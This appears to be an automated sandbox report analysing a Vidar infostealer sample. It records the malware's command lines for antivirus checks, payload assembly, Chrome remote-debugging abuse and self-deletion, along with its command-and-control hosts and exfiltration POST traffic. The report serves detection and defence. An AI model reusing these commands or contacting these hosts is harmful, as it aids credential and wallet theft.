Windows Analysis Report
CenteredDealing.exe

Overview

General Information

Sample name: CenteredDealing.exe
Analysis ID: 1582918
MD5: 228e734f246564bb255b68d51bd6d31e
SHA1: 13a36ae7bd290f4d7aba808d4435eb04008d3ac8
SHA256: 7174de5abf7299d3c6ab5460d57ff110be491dc47325c24465281200852f0f9a
Tags: exe, user-SquiblydooBlog

Detection

Vidar
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files

Classification

  • System is w10x64
  • CenteredDealing.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\CenteredDealing.exe" MD5: 228E734F246564BB255B68D51BD6D31E)
    • cmd.exe (PID: 7472 cmdline: "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7552 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7560 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7596 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7604 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7640 cmdline: cmd /c md 208639 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7656 cmdline: extrac32 /Y /E Dodge MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7692 cmdline: findstr /V "Borough" Architecture MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7708 cmdline: cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7724 cmdline: cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Rip.com (PID: 7740 cmdline: Rip.com d MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 8112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 6632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2248,i,8807016753924455708,494945956636832541,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 6920 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6476 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7756 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
    Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Rip.com d, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com, ParentProcessId: 7740, ParentProcessName: Rip.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8112, ProcessName: chrome.exe

    HIPS / PFW / Operating System Protection Evasion

    Source: Process started, Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7472, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7604, ProcessName: findstr.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-12-31T21:40:11.953332+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.13.109 | 443 | 192.168.2.4 | 49741 | TCP
    2024-12-31T21:40:13.382548+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.13.109 | 443 | 192.168.2.4 | 49742 | TCP
    2024-12-31T21:40:13.382414+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 116.203.13.109 | 443 | TCP
    2024-12-31T21:40:09.232471+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 116.203.13.109 | 443 | TCP

    AV Detection

    Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.1% probability
    Source: CenteredDealing.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: CenteredDealing.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\CenteredDealing.exe, Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\CenteredDealing.exe, Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\CenteredDealing.exe, Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\
    Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
    Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
    Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
    Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
    Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
    Source: chrome.exe, Memory has grown: Private usage: 9MB later: 41MB

    Networking

    Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49742 -> 116.203.13.109:443
    Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49739 -> 116.203.13.109:443
    Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.13.109:443 -> 192.168.2.4:49741
    Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.13.109:443 -> 192.168.2.4:49742
    Source: global traffic, HTTP traffic detected:
        GET /w211et HTTP/1.1
        Host: t.me
        Connection: Keep-Alive
        Cache-Control: no-cache
    Source: Joe Sandbox View, IP Address: 149.154.167.99
    Source: Joe Sandbox View, IP Address: 239.255.255.250
    Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknown, TCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknown, TCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic, HTTP traffic detected:
        GET / HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: h7h7h7.online
        Connection: Keep-Alive
        Cache-Control: no-cache
    Source: global traffic, HTTP traffic detected:
        GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
        Host: www.google.com
        Connection: keep-alive
        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: empty
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic, HTTP traffic detected:
        GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
        Host: www.google.com
        Connection: keep-alive
        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: empty
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic, HTTP traffic detected:
        GET /async/newtab_promos HTTP/1.1
        Host: www.google.com
        Connection: keep-alive
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: empty
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic, HTTP traffic detected:
        GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1
        Host: apis.google.com
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: */*
        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic, DNS traffic detected: DNS query: uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm
    Source: global traffic, DNS traffic detected: DNS query: t.me
    Source: global traffic, DNS traffic detected: DNS query: h7h7h7.online
    Source: global traffic, DNS traffic detected: DNS query: www.google.com
    Source: global traffic, DNS traffic detected: DNS query: apis.google.com
    Source: global traffic, DNS traffic detected: DNS query: play.google.com
    Source: unknown, HTTP traffic detected:
        POST / HTTP/1.1
        Content-Type: multipart/form-data; boundary=----s2n79hdjwbsjmyu37gvk
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: h7h7h7.online
        Content-Length: 256
        Connection: Keep-Alive
        Cache-Control: no-cache
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
    Source: chrome.exe, 00000011.00000003.1997216375.0000211000B04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996005271.000021100037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: CenteredDealing.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: CenteredDealing.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: chrome.exe, 00000011.00000003.1997193210.000021100037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
    Source: chrome.exe, 00000011.00000003.2002903400.000021100100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002849553.0000211001104000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002557621.0000211000FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2002978456.0000211001120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
    Source: CenteredDealing.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: CenteredDealing.exeString found in binary or memory: http://ocsp.digicert.com0
